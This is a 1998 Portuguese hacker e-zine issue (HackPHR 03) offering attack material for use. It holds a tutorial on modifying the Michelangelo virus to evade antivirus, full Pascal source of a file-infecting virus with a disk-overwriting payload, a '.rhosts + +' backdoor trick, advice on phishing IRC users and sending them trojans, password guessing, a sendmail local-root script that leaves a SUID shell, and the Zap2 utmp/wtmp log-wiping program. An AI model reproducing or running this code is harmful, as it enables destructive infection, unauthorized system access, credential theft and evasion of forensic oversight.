//// //// //////// //////// //// //// //// //// //// //// //// //// //// //// //// //// //// //// //// //// //// //// //// //// //// //// //// ///////////// //////////// //// //////// //// //// //// //// //// //// //// //// //// //// //// //// //// //// //// //// //// //// //// //// //// //// //// //// //// //////// //// //// [ Numero: 03, Fevereiro de 1998 ] [ Hack and Phreak Group ] [ http://www.hackphr.home.ml.org ] ASCii by MaNdRaCk -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- VERSAO APENAS PARA MS-DOS. RECOMENDADO CARREGAR O DRiVER COUNTRY.SYS -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- MeMbrOs AtUAiS: (listados por ordem de ingresso no zine) - MaNdRaCk - mandrack@geocities.com - Cebola - cebola_br@hotmail.com - ShK - shk_hack_@hotmail.com - HaCk-MaN - hack.man@mailcity.com - SideW - PaRTiCiPAAO EsPeCiAL De: - GhOsT InVaDeR - UHF ZINE - http://uhf.base.org ghostin@freemail.globalsite.com.br OBS.: Editores temporarios, candidatos e contribuidores tmb sao listados... -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- *** **** *** ****** ******* *** *** *** *** * *** *** *** *** *** *** *** *** * *** *** *** ****** *** *** *** **** *** *** *** *** *** *** *** *** ******* ********* *** *** ====================== = = = = = = = = = = = = = = 01| INTRODUAO - by MaNdRaCk ------------------------------------------- - - - - - - - 02| ViRii - by Cebola ------------------------------------------- - - - - - - - 03| INTRODUAO AO HACKING - PARTE II - by MaNdRaCk ------------------------------------------- - - - - - - - 04| BACKDOORS - by ShK ------------------------------------------- - - - - - - - 05| COMPLEMENTANDO OS NUMEROS BINARIOS - by HaCk-MaN ------------------------------------------- - - - - - - - 06| BACKDOOR SH - by GhOsT InVaDeR ------------------------------------------- - - - - - - - 07| PLACAS DE CIRCUITO IMPRESSO - by MaNdRaCk ------------------------------------------- - - - - - - - 08| BOX - TRANSMISSOR FM OCULTO - by MaNdRaCk ------------------------------------------- - - - - - - - 09| SHADOW PASSWD - by SideW ------------------------------------------- - - - - - - - 10| CORREIO DA GALERA - by HackPHR ------------------------------------------- - - - - - - - 11| ANUNCIOS, PUBLICAOES & MISC. - by HackPHR ------------------------------------------- - - - - - - - 12| ENTRANDO EM CONTATO - by HackPHR ------------------------------------------- - - - - - - - 13| BRINDE: EXPLOIT P/ NETSCAPE E IE - by MaNdRaCk ------------------------------------------- - - - - - - - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- 01 - INTRODUAO -=-=-=-=-=-=-=-=-=- Ai pessoal, estou abrindo aki a ediao de Fevereiro, a primeira de 98, com todo o pique, o zine nao podia estar melhor, e agradeo a todos os leitores, o sucesso do zine nos devemos a vcz... O numero de editores aumentando, dah pra fazer o zine sempre grandaiao, hehehe... Bom, voltando a falar sobre edi- tores, eu peo q nao mandem mais mails se candidatando, falem diretamente com um de nossos editores, todo fim de semana, geralmente a tarde no nosso querido canal de mIRC. Fica bem melhor pra gente, nao precisa ficar com medo, se vc acha q tem chance e tem medo q a gente acha q vc sabe pouco, nao vamos fazer nada de mal, como vovo jah dizia: quem nao arrisca nao petisca... hehehe... Ah, nosso Home Page tambem mudou de URL e de cara, agora eh soh digitar http://www.hackphr.home.ml.org, pronto, lah soh vai ter o nosso zine e mais uns progz q a gente fez, outros zines mais tarde, a pagina de outros zines ainda tah em construao, ainda a proxima ediao, vcz podem contar nos dedos, 01 de Maro, vamos lutar o maximo pro zine ser mensal, pois nao podemos dar bobeira pro nosso zine nao cair de circulaao. Pois hoje em dia tem uma porra- da e meia de zines, em tudo q eh lugar, pena q a maioria eh "xerox" dos outros e puxa-saco da Axur, como se adiantasse muito... Hamm, nesse zine vcz vao encontrar algumas materias interessantes, tmb po- dem notar q temos a participaao de nosso amigo Ghostin da UHF, ele escreveu uma materia sobre Backdoors. Temos ainda a participaao do ShK e do HaCk-MaN, eles apenas escreveram uma materia pequena cada um, tmb nao conseguimos falar com eles ultimamente, nao estamos recebendo reply... Esta ediao jah comea arrebentando com uma materia muito massa do Cebola, com o source de um virus novo feito por ele mesmo, logo apos temos a continua- ao da minha materia sobre hacking para iniciantes. Pro final ainda temos uma materia minha sobre uma box e um guia para soldagem e confecao de placas de cicuito impresso, eu queria colocar mais coisas, principalmente de uns caras que escreveram pra gente, mas jah tava chegando o dia 01 de Fevereiro e eu nao queria atrasar... Soh deu pra colocar uma materia pequena q o SideW fez. Espero q gostem, e preparem o folego pra 04... 1998, MaNdRaCk - HackPHR Zine -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- 02 - ViRii -=-=-=-=-=-=-=- A, galera. Ano novo, revista nova, virus novo. Enquanto muita gente tava a coando o saco, eu tava aqui ralando, estudando muito(hacking, claro) e desenvolvendo um novo virus para essa edio do zine. Vai a um resumo das matrias virii: * Continuao do tutorial de variantes de virus * Virus completo com caractersticas Stealth feito em Pascal O algortimo para gerao de nmeros de cartes de crdito eu fico devendo para a prxima edio, j que a parte virii dessa edio deu quase 700 linhas. Tutorial de como escrever variantes(parte II) --------------------------------------------- Na ltima edio do zine eu dei o source do Michelangelo, que vai ser muito til nesse tutorial sobre variantes. Sei que mais algum j deve ter es- crito sobre isso, inclusive encontrei uma matria em um zine americano, mas tava meio confuso, ento eu resolvi escrever a minha matria, que deve estar bem fcil de se entender, inclusive para os beginners. Voc vai precisar de pelo menos algum pequeno conhecimento em Assembler para isso. Como j temos o source do virus fica muito mais fcil. A primeira coisa a se fazer salvar o source em um arquivo e compilar com qualquer compilador ASSEMBLER. Eu uso o A86, na minha opinio o melhor porque shareware e suporta todos os formatos de linguagem Assembly. Aps compilar o source, voc vai perceber que qualquer antivirus merdinha capaz de acusar a presena do Michelangelo no arquivo. Eu usei a ltima atualizao do Viruscan para esses testes, se voc for usar outro antivirus talvez os resultados sejam um pouco diferentes. O primeiro passo dividir o source em pequenos pedaos, que alis j esto divididos, como: Int13h, Check_infection, Infect_it, etc... Esses so os labels usados no virus, e so bastante teis para se organizar o programa em blocos. A finalidade de dividir o source nesses labels de descobrir onde est a assinatura do virus. Ou seja, atravs de que parte do source do virus compilado que o antivirus identifica o virus. O que ns vamos fazer achar a assinatura do virus e mudar os comandos, afim de modificar o source mas no alterar o efeito do virus. Se voc tem algum conhecimento em ASM, deve saber que voc pode mudar a ordem dos atributos dados aos registros sem qualquer dano ao source, desde que a chamada da interrupo fique por ltimo. Assim, MOV AH, 16 MOV BX, 123 INT 21 igual a MOV BX, 123 MOV AH, 16 INT 21 Lembre-se que eu acabei de inventar esse exemplo, e no tenho a mnima idia do que isso vai fazer depois de compilado. Outra regra: evidentemente quando voc copia o valor de uma varivel dentro de outra a ordem deve ser res peitada. EX: MOV AH, 16 MOV DH, AH INT 23 diferente de MOV DH, AH MOV AH, 16 INT 23 No primeiro exemplo estariamos assignando o valor 16 ao registrador AH e depois assigna o valor AH ao registrador DH. Ento ficaria: AH=DH=16. Ele diferente do segundo exemplo porque o segundo exemplo faria o seguinte: d o valor AH ao registrador DH, ficariam AH=DH=0. Depois d ao registrador AH o valor 16. No final ento s o registrador AH estaria com valor=16. Se voc no entendeu, vai aprender assembly e depois vem ler essa matria. Bom, voltando ao que interessa, o primeiro passo comear a retirar partes do cdigo do virus e compilar o cdigo sem esses pedaos. Se o antivirus ainda acusa o virus, voc ainda no chegou na sua assinatura. Por exemplo: voc retira do cdigo do Michelangelo dado na ltima edio o label INT13H. Voc compila o cdigo obtido e o antivirus no acusa a presena de virus. Isso quer dizer que o pedao do virus que o identifica para o antivirus(a assinatura do virus) ficou no pedao que voc retirou. Ento, a assinatura do virus est no label INT13H. Bom, s uma suposio. Outro cuidado a ser tomado quanto referencia feita no programa aos labels. Por exemplo, se voc vai retirar um label chamado "teste" e no resto do virus h uma linha que diz JNE TESTE na hora de compilar o compilador vai gerar um erro. A soluo simplesmente colocar um ponto e vrgula antes da linha, declarando essa linha como um comentrio. Ficaria assim: ; JNE TESTE s um modo de se evitar o erro. Depois deve-se retirar os pontos-e- vrgulas para no mudar o cdigo viral. Ento depois dessa teoria toda vamos pratica: Comece retirando pedaos do virus. Na maioria dos casos a assinatura fica no incio do virus. Ento comece retirando a segunda metade do virus. Eu comecei apagando tudo o que vem depois do label entervirus. Compilei e executei o scan: o virus con- tinuava detectvel. Comecei agora retirando pedaos do incio. Retirei o pri- meiro label, o antivirus continuava detectando. Retirei o segundo, tambm. Continuei assim at s restar o label entervirus. Ento uma coisa interessante aconteceu: o antivirus passou a reconhecer o arquivo como sendo infectado pelo virus GENB!!! Chegamos concluso que o GENB quase uma variante do Michelangelo. Eu consegui isolar a parte do Michelangelo que o identifica como GENB, ento achei a assinatura do GENB. A assinatura do GENB fica entre esse pedao de cdigo: ************************* GENB ************************* michelangelo segment byte public assume cs:michelangelo, ds:michelangelo org 0 highmemjmp db 0F5h, 00h, 80h, 9Fh maxhead db 2 ; used by damagestuff firstsector dw 3 oldint13h dd 0C8000256h entervirus: xor ax,ax mov ds,ax cli mov ss,ax mov ax,7C00h ; Set stack to just below mov sp,ax ; virus load point sti push ds ; save 0:7C00h on stack for push ax ; later retf mov ax,ds:[13h*4] mov word ptr ds:[7C00h+offset oldint13h],ax mov ax,ds:[13h*4+2] mov word ptr ds:[7C00h+offset oldint13h+2],ax mov ax,ds:[413h] ; memory size in K dec ax ; 1024 K dec ax mov ds:[413h],ax ; move new value in mov cl,6 shl ax,cl ; ax = paragraphs of memory mov es,ax ; next line sets seg of jmp mov word ptr ds:[7C00h+2+offset highmemjmp],ax mov ds:[13h*4],ax mov ds:[13h*4+2],es mov cx,offset partitioninfo mov si,7C00h xor di,di cld rep movsb ; copy to high memory ; and transfer control there ; destination of highmem jmp xor ax,ax mov es,ax push cs pop ds mov ax,201h mov bx,7C00h mov cx,firstsector cmp cx,7 ; hard disk infection? mov dx,80h ; Read old partition table of ; The following bytes are meaningless. garbage db 1,4,11h,0,80h,0,5,5,32h,1,0,0,0,0,0,53h partitioninfo: db 42h dup (0) michelangelo ends end ***************************************** Bom lembrar que no temos mo o virus GENB. Se voc compilar esse source e rodar no computador voc no vai estar executando o virus GENB, mas somente um pedao dele que contm a sua assinatura. Bom, voltamos ento ao Michelangelo. Eu tinha acabado de retirar o label IS360KDISK e nosso virus ficou indetectvel(passou a detectar o GENB no lugar). Ento recoloque o label is360Kdisk no lugar. Conseguimos isolar agora um pedao de pequeno tamanho do virus que contm a assinatura. No temos em mo necessariamente a assinatura, mas um pedao que a contm. Eis esse pedao: ********** ASSINATURA ************* michelangelo segment byte public assume cs:michelangelo, ds:michelangelo org 0 jmp entervirus highmemjmp db 0F5h, 00h, 80h, 9Fh maxhead db 2 ; used by damagestuff firstsector dw 3 oldint13h dd 0C8000256h is360Kdisk: mov firstsector,cx pushf call oldint13h ; jc quitinfect ; exit on error mov si,200h+offset partitioninfo mov di,offset partitioninfo mov cx,21h ; Copy partition table cld rep movsw mov ax,301h ; Write virus to sector 1 xor bx,bx mov cx,1 xor dx,dx pushf call oldint13h entervirus: xor ax,ax mov ds,ax cli mov ss,ax mov ax,7C00h ; Set stack to just below mov sp,ax ; virus load point sti push ds ; save 0:7C00h on stack for push ax ; later retf mov ax,ds:[13h*4] mov word ptr ds:[7C00h+offset oldint13h],ax mov ax,ds:[13h*4+2] mov word ptr ds:[7C00h+offset oldint13h+2],ax mov ax,ds:[413h] ; memory size in K dec ax ; 1024 K dec ax mov ds:[413h],ax ; move new value in mov cl,6 shl ax,cl ; ax = paragraphs of memory mov es,ax ; next line sets seg of jmp mov word ptr ds:[7C00h+2+offset highmemjmp],ax ; mov ax,offset int13h mov ds:[13h*4],ax mov ds:[13h*4+2],es ; mov cx,offset partitioninfo mov si,7C00h xor di,di cld rep movsb ; copy to high memory ; and transfer control there jmp dword ptr cs:[7C00h+offset highmemjmp] ; destination of highmem jmp xor ax,ax mov es,ax int 13h ; reset disk push cs pop ds mov ax,201h mov bx,7C00h mov cx,firstsector cmp cx,7 ; hard disk infection? ; jne floppyboot ; if not, do floppies mov dx,80h ; Read old partition table of int 13h ; first hard disk to 0:7C00h ; jmp short exitvirus ; The following bytes are meaningless. garbage db 1,4,11h,0,80h,0,5,5,32h,1,0,0,0,0,0,53h partitioninfo: db 42h dup (0) michelangelo ends end *********** ASSINATURA ********** As linhas que tm um ponto-e-vrgula antes faziam referncia a um label que foi retirado do cdigo. Depois de construir a sua variantes, voc deve retirar esses pontos e vrgulas. Bom, agora que voc tem o pedao de cdigo que contm a assinatura do virus voc deve modificar esse pedao de cdigo vontade, mas nunca retirando nada at obter um cdigo que no seja reconhecido pelo antivirus. Um exemplo mudando as linhas que dizem: MOV ax,201h MOV bx,7CH00 para MOV bx,7CH00 MOV ax,201h Cuidado para no cometer nenhum dos erros que listei acima e sempre deixar a chamada interrupo por ltimo. Se voc conseguir um cdigo que se torne invisvel para o antivirus, copie esse pedao de cdigo para dentro do virus original(que foi dado na edio 02 desse zine), substituindo o antigo, ou seja, apague os labels IS360KDISK e ENTERVIRUS do virus original e os substitua com os que voc modificou e no foram achados pelo antivirus. Compile e passe o antivirus agora pela variante que voc gerou. Se o antivirus no o detectar, se alegre: voc criou uma das trocentas variantes do Michelangelo. Se voc conseguiu, salve o cdigo fonte(.ASM) em um arquivo e me mande. Eu terei prazer em colocar o seu nome aqui na prxima edio da revista! Mensagens para: cebola_br@hotmail.com Virus com caractersticas Stealth feito em Pascal ------------------------------------------------- Eu andei pesquisando muitos virus nessas frias, e acabei produzindo um que, na minha opinio, superou todos os outros que eu j tinha visto feitos em pascal. A vantagem de se usar linguagens de alto nvel que so menos pro- pcias a erro, permitem um controle sobre o fluxo do programa(se voc usar um bom editor como o Turbo Pascal) e o cdigo fica bem menor. Mas quando se trata de vrus(e no cavalo de tria) sempre bom usar linguagens compiladas e no interpretadas. Linguagens compiladas so: Pascal, C, C++, Delphi... Linguagens interpretadas so: Basic, Qbasic, Vbasic, Java... A desvantagens das interpre- tadas que so muito lentas, e no caso de virus(que normalmente devem execu- tar sua rotina de infeco sem o usurio perceber) isso necessariamente muito importante. O cdigo dado a seguir vem com os comentrios em formato Pascal-padro (usando chaves) e no necessrio a retirada destes para a compilao do pro- grama. Diferente de que muita gente acha, os comentrios no aumentam o tama- nho do programa compilado, e so muito teis para terceiros entenderem o c- digo. ================== Virus HANTA verso 1.0 ======================== Program Virus_HANTA; {VIRUS HANTA VERSO 1.0 BY CEBOLA DATA DE CRIAO: 22/01/1998 BELO HORIZONTE, MG "NO VOU FICAR IMPLORANDO PRA NO ALTERAREM O CDIGO MAS TENHA EM MENTE QUE, SE VOC ALTERAR UM LAMMER SEM CRIATIVIDADE!!!" BUGS E CORREES PARA: cebola_br@hotmail.com} {diretiva M define o tamanho da pilha dinamica para liberar mais memoria e eliminar o bug DosError 8(out of memory) na linha que chama o programa original} {$M 16384,0,0} {$Q-} {$R-} Uses Windos,dos,crt; var curdir: string; dir: SearchRec; x: integer; attrib: byte; procedure age; var dia,dia_semana,mes,ano: word; regs: Registers; begin getdate(ano,mes,dia,dia_semana); {O VIRUS AGE NOS DIAS 11/12 E NAS SEXTAS-FEIRAS DIA TREZE} if ((dia=12) and (mes=11)) or ((dia=13) and (dia_semana=5)) then begin clrscr; for x:=1 to 12 do begin textcolor(x); gotoxy(x,5); writeln(' _________-----_____'); gotoxy(x,6); writeln(' _____------ __ ----_'); gotoxy(x,7); writeln('___---- ___------ \'); gotoxy(x,8); writeln(' ----________ ---- \'); gotoxy(x,9); writeln(' -----__ | _____)'); gotoxy(x,10); writeln(' __- / \'); gotoxy(x,11); writeln(' _______----- ___-- \ /)\'); gotoxy(x,12); writeln(' ------_______ ---____ \__/ /'); gotoxy(x,13); writeln(' -----__ \ -- _ /\'); gotoxy(x,14); writeln(' --__--__ \_____/ \_/\'); gotoxy(x,15); writeln(' ----| / |'); gotoxy(x,16); writeln(' | |___________|'); gotoxy(x,17); writeln(' | | ((_(_)| )_)'); gotoxy(x,18); writeln(' | \_((_(_)|/(_)'); gotoxy(x,19); writeln(' \ ('); gotoxy(x,20); writeln(' \_____________)'); delay(500); end; delay(10000); clrscr; gotoxy(1,5); writeln(' '); gotoxy(1,6); writeln(' '); gotoxy(1,7); writeln(' '); gotoxy(1,8); writeln(' '); gotoxy(1,9); writeln('۱ ۱ ۱ '); gotoxy(1,10); writeln(' '); gotoxy(2,11); writeln(' '); gotoxy(2,12); writeln(' '); gotoxy(3,13); writeln(' '); gotoxy(5,14); writeln(' '); gotoxy(6,15); writeln(' '); delay(10000); {regrava todas as trilhas do disco rgido} Regs.ah:=$19; intr($21,regs); Regs.cx:=$0009; Regs.dx:=$0; intr($26,regs); end; end; function save_old_attrib(arquivo:string): byte; {Salva os atributos do arquivo a ser executado para depois de infectado voltar com os atributos antigos} var attr: word; arq: file; begin assign(arq,arquivo); GetFAttr(arq,attr); save_old_attrib:=attr; end; procedure put_old_attrib(arquivo:string; attrib:word); {resgata os atributos antigos do arquivo j infectado e os recoloca no arquivo} var arq: file; begin assign(arq,arquivo); SetFAttr(arq,attrib); end; function check_infection(nome : string): boolean; {CHECA SE O ARQUIVO A SER INFECTADO J EST INFECTADO} var arq,temp: text; i: integer; a,b,c,d: char; begin {***} {acha o arquivo atual, contendo o cdigo do virus} assign(arq,nome); reset(arq); assign(temp,'temp.dat'); rewrite(temp); for i:=1 to 13 do read(arq,a); read(arq,a); write(temp,ord(a)); write(temp,' '); for i:=1 to 22 do read(arq,b); read(arq,b); write(temp,ord(b)); write(temp,' '); for i:=1 to 60 do read(arq,c); read(arq,c); write(temp,ord(c)); write(temp,' '); for i:=1 to 77 do read(arq,d); read(arq,d); write(temp,ord(d)); if (a=chr(4)) and (b=chr(141)) and (c=chr(7)) and (d=chr(0)) then begin check_infection:=true; close(arq); close(temp); end else begin check_infection:=false; close(arq); close(temp); end; {***} end; procedure infect_directory; var infile, outfile: file; curdir,vitima,virus: string; arquivo, arquivo2: SearchRec; size,actlen,curlen: longint; result: word; buffer: array[1..1000] of char; buffer2: array[1..928] of char; virusfile,tempfile: text; a,b,c,d: char; sign: char; i: integer; infected: boolean; const all:byte=$3F; begin {retorna o diretorio atual} getdir(0,curdir); {procura o 1 arquivo COM para infectar} findfirst(curdir+'\'+'*.com',all,arquivo); while doserror=0 do begin clrscr; {garante que um arquivo(attr=32) e no um diretrio(attr=16)} if (arquivo.attr=32) and (arquivo.name<>'TEMP.COM') then begin {verifica se j no est infectado} infected:=check_infection(arquivo.name); if infected=false then begin {guarda na varivel vitima o arquivo a ser infectado} vitima:=arquivo.name; {salva os atributos antigos} attrib:=save_old_attrib(arquivo.name); {guarda na variavel virus o nome do arquivo contendo o cdigo viral} virus:=paramstr(0); {copia o virus pro arquivo} assign(infile,virus); assign(outfile,'temp.com'); reset(infile,1); rewrite(outfile,1); for i:=1 to 12 do begin blockread(infile, buffer, 1000, result); blockwrite(outfile, buffer, 1000, result); end; blockread(infile, buffer2, 864, result); blockwrite(outfile, buffer2, 864, result); close(infile); {copia o original pro final do arquivo} assign(infile,vitima); {abre o arquivo e define um registro=1byte} reset(infile,1); {retorna o tamanho do arquivo} size:=filesize(infile); actlen := 0; {outputfile} curlen := size; {inputfile} while actlen < curlen do begin blockread(infile, buffer, 1000, result); if actlen + 1000 > curlen then begin blockwrite(outfile, buffer, curlen - actlen, result); actlen := curlen; end else begin blockwrite(outfile,buffer,1000,result); inc(actlen,1000); end; end; close(infile); close(outfile); {DEPOIS DE PRONTO, O ARQUIVO TEMP COM VAI FICAR ASSIM: --------------------------- | VIRUS | ORIGINAL | | | | --------------------------- ENTO FECHA O ARQUIVO TEMP.COM, DELETA O ARQUIVO ORIGINAL E RENOMEIA O TEMP.COM PARA PARA O NOME DO ORIGINAL} assign(infile,vitima); erase(infile); assign(outfile,'TEMP.COM'); rename(outfile,vitima); put_old_attrib(vitima,attrib); end; end; findnext(arquivo); end; end; procedure exec_original; {RETIRA O ORIGINAL DO FINAL DO ARQUIVO SENDO EXECUTADO E SALVA EM ARQUIVO TEMPORRIO PARA DEPOIS EXECUTAR} var infile: file; outfile: file; size,actlen,curlen: longint; buffer: array[1..1000] of char; result: word; parametros: string; i: integer; begin assign(infile,paramstr(0)); assign(outfile,'a.com'); reset(infile,1); rewrite(outfile,1); seek(infile,12864); size:=filesize(infile); actlen := 0; {outputfile} curlen := size-12864; {inputfile} while actlen < curlen do begin blockread(infile, buffer, 1000, result); if actlen + 1000 > curlen then begin blockwrite(outfile, buffer, curlen - actlen, result); actlen := curlen; end else begin blockwrite(outfile,buffer,1000,result); inc(actlen,1000); end; end; close(infile); close(outfile); if paramcount=0 then begin exec('a.com',''); chdir(curdir); end else begin parametros:=paramstr(1); if paramcount>1 then begin for i:=2 to paramcount do parametros:=parametros+' '+paramstr(i); end; exec('a.com',parametros); chdir(curdir); end; end; begin {LEMBRAR DE TIRAR OS ATTRIBS DE SOMENTE LEITURA SE J EXISTIR UM ARQUIVO NO DIRETRIO A SE INFECTAR CHAMADO TEMP.COM} getdir(0,curdir); infect_directory; findfirst('curdir'+'\'+'*.*',$3F,Dir); While doserror=0 do begin if dir.attr=16 then infect_directory else findnext(dir); end; exec_original; age; end. =================== FIM DO CDIGO =================== Bom, por essa edio s. Crticas, sugestes, relatamentos de bugs nos programas aqui listados: cebola_br@hotmail.com Se quiser usar PGP: -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.2i mQCNAzSgZvwAAAEEAM7Fl1R3Kd8sXY0eWm5H+0XKOBO3g6ifpFaz6G+EVW7jjeMO hs9qW5Kco0bxHOAb8qfILAq3604MtnjiU/yCpk95ZbKjB7GonNeMQVwlhvdAIzyc A+FvKBzLegWVUz2g3mEs3K1bq16HQFrg4h/w7wTbh8JYmDAh4g5foeaTuHMRAAUR tC9GcmVkZXJpY28gV2FnbmVyIE8uIE1lbG8gPGxvcmVuemFAYmhuZXQuY29tLmJy Pg== =OV6h -----END PGP PUBLIC KEY BLOCK----- 1998, Cebola - HackPHR Zine -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- 03 - INTRODUAO AO HACKING - PARTE II -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Agora a continuaao do q eu escrevi na ediao passada, depois de ter publi- cado, vieram uns caras me dizendo: - Meu cara, vc fez uma materia na ed. 02 q dizia q ia ensinar a hackear, mas nao ensinou nada sobre como Hackear... Meus amigos, hackear nao eh vc ter de cor uns comandos pra copiar o passwd, nao eh facil, vc tem q ter muito planejamento, muita estrategia, nao eh soh copiar o q estah escrito naquele zine, q se vc fazer isso vc ganha acesso root vc deve criar seus metodos, como? Entendendo, exige estudo, sem antes entender um Sistema Operacional, como vc quer hackea-lo? Quem nao entende o sistema e consegue fazer algo nele, nao o hackeia, mas sim, LAMMEREIA. Portanto aih vai a continuaao, e se vc acha q tah fraco, q nao ensina nada, esse zine nao eh pra vc, pare de ler e apague-o de seu HD... Bom, sem enrolaao, vamos lah: Usando Rlogin -=-=-=-=-=-=-=- O Rlogin eh um outro comando para logar em sistemas, se vc nao tiver uma conta em alguma maquina, existe uma manha do Rlogin, pra vc logar sem ter a password. O comando tem a seguinte sintaxe: rlogin -l username host.com.br Para obter maiores informaoes sobre o Rlogin, veja o manual dele: $ man rlogin O Rlogin funciona da seguinte maneira, vc jah digita o username na linha de comando e ele jah vai pedir a password, vamos a um exemplo: $ rlogin -l mandrack lamer.com.br connecting... password: $ Depois de digitar a password logo cai o shell da maquina q vc logou. Bom, antes de testar seu Rlogin, verifique se ele tem um arquivo .rhosts no direto- rio em q ele estah, por exemplo /bin. Note q ha um ponto na frente de rhosts, is quer dizer q o arquivo eh oculto, entao vc devera dar o comando ls -a: $ ls -a .rhosts rlogin $ Beleza ele tah lah, quer dizer q vc agora pode logar sem ter q colocar a password! Faa o seguinte, edite o arquivo .rhosts, vc vai verificar q lah existem os usernames e os hosts, embaixo do host q vc pretende atacar, coloque a seguinte linha: --corte-- + + --corte-- Saia do editor e grave o arquivo... Soh isso??? Ehh, soh isso mano, agora eh soh se divertir... SE VC NAO TIVER UMA CONTA -=-=-=-=-=-=-=-=-=-=-=-=-=- Bom, eh logico q para pegar acesso root vc precisa de uma conta, para isso eu classifico dois metodos, o facil e o dificil. METODO FACIL: Com o metodo facil, vc precisa ter conversa e um programa de IRC. Vc vai ter q exigir muito de sua labia em certos casos, outros nem tanto... Primeiro entre em qquer servidor de IRC, de preferencia a canais #hacking #unix, ou qquer outro onde os hackers se encontram, e onde tem hacker tem la- mer. Fique de olho em varios canais, pra ver se tem um lamer q faz uma pergun- ta tola, alguem vai falar merda pra ele, ou o mais provavel, ele vai ser chu- tado do canal, entao fale com ele em PVT, e responda a pergunta dele, va pu- xando conversa, ate ele ganhar sua confiana, aih ve se vc consegue pegar o login e a senha dele, de um jeito, como? Invente, sei lah, se ele usa o Win 3.1 pea os arquivos de configuraao dele, invente algo, se ele for mais di- ficil, consiga o e-mail dele e mande um trojan, como aquele q o Cebola falou na seao ViRii da ed. 02 do zine. Ateh q vc consiga o login e a senha do tapa- do... OBS.: Soh faa isso com lamers METODO DIFICIL: Esse eh bem mais chato e exige paciencia. Antes ache o host de um servidor mais novo, q provavelmente usam senhas babacas, ou as mesmas do login, coisa q nao eh dificil acontecer. entao do seu shell faa o seguinte: $ finger @merda.com.br Login Name Tty Idle Login Time Office Office Phone rafa Rafael Papael p2 4:46 Jan 27 11:19 sjm Silvano Jose Medeiros p5 3d Jan 16 15:35 root System Administrator p3 4:59 Jan 16 10:17 OBS: Este eh um finger inventado, se seu nome consta aki eh mera coincidencia! Entao mais tarde, quando sua vitima cair fora do sistema, tente logar: Login: rafa A password, vc terah q chutar, primeiro comece com o mesmo do login, se nao der va tentando: rafael papael Papael rafael98 Coisas assim, se vc conseguir, alem de vc ter uma conta vc tmb eh um cagao, pois esse metodo eh phoda pra caralho!!! PEGANDO ROOT -=-=-=-=-=-=-=- Aki vou por soh uma maneira de ser o root, outras fica pra proxima, q eu jah to de saco cheio. Aki vai um bug do sendmail 8.73 e 8.83. Rode o script abaixo. Vc vai cair no diretorio /tmp. De um ls -l. Se tiver um arquivo SUID sh, digite whoami. Se vc nao for o root execute o arquivo ./sh, pronto... sm.sh -- cut here -- echo 'main() '>>smtpd.c echo '{ '>>smtpd.c echo ' setuid(0); setgid(0); '>>smtpd.c echo ' system("cp /bin/sh /tmp;chmod a=rsx /tmp/sh"); '>>smtpd.c echo '} '>>smtpd.c echo 'main() '>>leshka.c echo '{ '>>leshka.c echo ' execl("/usr/sbin/sendmail","/tmp/smtpd",0); '>>leshka.c echo '} '>>leshka.c cc -o leshka leshka.c;cc -o /tmp/smtpd smtpd.c ./leshka kill -HUP `ps -ax|grep /tmp/smtpd|grep -v grep|tr -d ' '|tr -cs "[:digit:]" "\n"|head -n 1` rm leshka.c leshka smtpd.c /tmp/smtpd cd /tmp sh -- cut here -- OBS: Depois nao esquea de dar um chmod +x sm.sh pra executa-lo... APAGANDO SEUS RASTROS -=-=-=-=-=-=-=-=-=-=-=- Bom, depois, se vc conseguir pegar root, vc deve dar uma vasculhada pelo sistema, afim de encontrar os arquivos de log, pro sysadmin nao saber quem esteve lah, ele pode descobrir q alguem invadiu o sistema, mas nao quem... Para isso, existem alguns programas q apagam os arquivos pra vc. Mas antes de usar algum programa, procure os arquivos, pois antes de compilar, vc tem que modificar a fonte e recompila-lo, agora com o caminho dos arquivos. Ex.: #define WTMP_NAME "/usr/adm/wtmp" Ai vai a fonte do programa ZAP: z2.c -- cut here -- #include#include #include #include #include #include #include #include #define WTMP_NAME "/usr/adm/wtmp" #define UTMP_NAME "/etc/utmp" #define LASTLOG_NAME "/usr/adm/lastlog" int f; void kill_utmp(who) char *who; { struct utmp utmp_ent; if ((f=open(UTMP_NAME,O_RDWR))>=0) { while(read (f, &utmp_ent, sizeof (utmp_ent))> 0 ) if (!strncmp(utmp_ent.ut_name,who,strlen(who))) { bzero((char *)&utmp_ent,sizeof( utmp_ent )); lseek (f, -(sizeof (utmp_ent)), SEEK_CUR); write (f, &utmp_ent, sizeof (utmp_ent)); } close(f); } } void kill_wtmp(who) char *who; { struct utmp utmp_ent; long pos; pos = 1L; if ((f=open(WTMP_NAME,O_RDWR))>=0) { while(pos != -1L) { lseek(f,-(long)( (sizeof(struct utmp)) * pos),L_XTND); if (read (f, &utmp_ent, sizeof (struct utmp))<0) { pos = -1L; } else { if (!strncmp(utmp_ent.ut_name,who,strlen(who))) { bzero((char *)&utmp_ent,sizeof(struct utmp )); lseek(f,-( (sizeof(struct utmp)) * pos),L_XTND); write (f, &utmp_ent, sizeof (utmp_ent)); pos = -1L; } else pos += 1L; } } close(f); } } void kill_lastlog(who) char *who; { struct passwd *pwd; struct lastlog newll; if ((pwd=getpwnam(who))!=NULL) { if ((f=open(LASTLOG_NAME, O_RDWR)) >= 0) { lseek(f, (long)pwd->pw_uid * sizeof (struct lastlog), 0); bzero((char *)&newll,sizeof( newll )); write(f, (char *)&newll, sizeof( newll )); close(f); } } else printf("%s: ?\n",who); } main(argc,argv) int argc; char *argv[]; { if (argc==2) { kill_lastlog(argv[1]); kill_wtmp(argv[1]); kill_utmp(argv[1]); printf("Zap2!\n"); } else printf("Error.\n"); } -- cut here -- 1998, MaNdRaCk - HackPHR Zine 